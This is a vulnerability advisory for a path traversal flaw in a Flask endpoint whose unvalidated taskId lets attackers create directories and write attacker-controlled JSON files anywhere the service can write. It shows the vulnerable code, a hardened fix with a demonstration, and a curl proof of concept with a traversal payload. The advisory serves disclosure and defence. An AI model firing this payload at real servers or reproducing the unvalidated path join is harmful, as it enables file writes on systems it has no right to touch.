This vulnerability was found by Songwu (security researcher), Zeyu Luo (security researcher), Dr. CAO Yinfeng, Kevin (The Hong Kong Polytechnic University / HKCT Institute of Higher Education)
vulnerability description
The /action-data endpoint reads a taskId field from the JSON body of a POST request and passes it directly into os.path.join() to build the storage path, without any validation of the value.
os.path.join() only concatenates path segments: it neither normalises nor rejects .. components. When taskId contains ../, the resulting path climbs out of the intended data/<date>/ directory one level per segment according to the operating system's path resolution rules, so the directory that os.makedirs() creates can be anywhere on the server's filesystem that the service account can write to. (An absolute taskId such as /tmp/x has the same effect, since os.path.join() discards everything before an absolute component.)
The file written into that directory is named summary_event_<timestamp>.json by the server, but its content is the full JSON body supplied in the attacker's POST request, so the file contents are attacker-controlled.
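The traversal mechanics described above, and the two checks a fix needs (an allowlist on taskId, plus a containment check on the resolved path before anything is created on disk), as an added example that is not part of the original advisory or the affected project's code. The root /srv/app/data and the date folder 20240101 are constructed for the demonstration; the vulnerable construction mirrors the one in the advisory.

```python
import os
import re

# Allowlist for taskId. The exact character set is an assumption made here;
# a deployment should pick the narrowest set its real task identifiers need.
TASK_ID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def unsafe_folder(data_root, date_folder, task_name):
    """The server's construction: os.path.join only concatenates. It does not
    reject '..' and it drops data_root entirely if task_name is absolute."""
    return os.path.join(data_root, date_folder, task_name)


def escapes_root(data_root, path):
    """True if `path`, once normalised, does not lie under `data_root`."""
    root = os.path.abspath(data_root)
    target = os.path.abspath(path)
    return os.path.commonpath([root, target]) != root


def safe_folder(data_root, date_folder, task_name):
    """Hardened builder: allowlist the identifier first, then verify that the
    resolved directory is still inside the data root. Both checks run before
    os.makedirs() would be called, so nothing is created on a bad input."""
    if not TASK_ID_RE.fullmatch(task_name):
        raise ValueError(f"invalid taskId: {task_name!r}")
    root = os.path.realpath(data_root)
    folder = os.path.realpath(os.path.join(root, date_folder, task_name))
    if os.path.commonpath([root, folder]) != root:
        raise ValueError("taskId resolves outside the data directory")
    return folder


def is_rejected(data_root, date_folder, task_name):
    """Does the hardened builder refuse this taskId?"""
    try:
        safe_folder(data_root, date_folder, task_name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    root = "/srv/app/data"  # hypothetical deployment root, constructed for the demo
    date = "20240101"       # constructed; the server derives this from the clock
    for tid in ["task_1",
                "../../../../../../../../tmp/pwned2",   # the advisory's PoC value
                "/tmp/pwned2",                          # absolute: join drops the root
                "..\\..\\x"]:                           # harmless on POSIX, still rejected
        joined = unsafe_folder(root, date, tid)
        print(f"{tid!r:40} -> {joined!r:50} "
              f"escapes={escapes_root(root, joined)} "
              f"rejected={is_rejected(root, date, tid)}")
```

The allowlist alone would already stop this bug; the containment check is defence in depth for the case where the identifier rules are later relaxed. The check must be done on the resolved path (realpath) and must come before os.makedirs(), otherwise a symlink planted in an earlier request, or the directory creation itself, can still land outside the root.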
vulnerability component
action_collect_server.py:10-18
import datetime
import json
import os

from flask import Flask, request

app = Flask(__name__)


def mkdir_n_define_file_name(data_root_dir, task_name):
    timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
    date_folder = timestamp.split('_')[0]
    folderpath = os.path.join(data_root_dir, date_folder, task_name)  # ← vulnerability: task_name joined with no validation
    if not os.path.exists(folderpath):
        os.makedirs(folderpath)  # ← creates whatever directory the joined path points to
    filename = f"summary_event_{timestamp}.json"
    filepath = os.path.join(folderpath, filename)
    return filepath


@app.route('/action-data', methods=['POST'])
def handle_event():
    event_data = request.get_json()
    task_id = event_data["taskId"]  # ← taken from user input without any filter
    filepath = mkdir_n_define_file_name("data", task_id)
    with open(filepath, "w", encoding='utf-8') as json_file:
        json.dump(event_data, json_file, indent=2)  # ← file content controlled by the attacker
POC
curl -X POST http://yourhost:4934/action-data \
  -H "Content-Type: application/json" \
  -d '{
    "taskId": "../../../../../../../../tmp/pwned2",
    "anykey": "anyvalue"
  }'
result
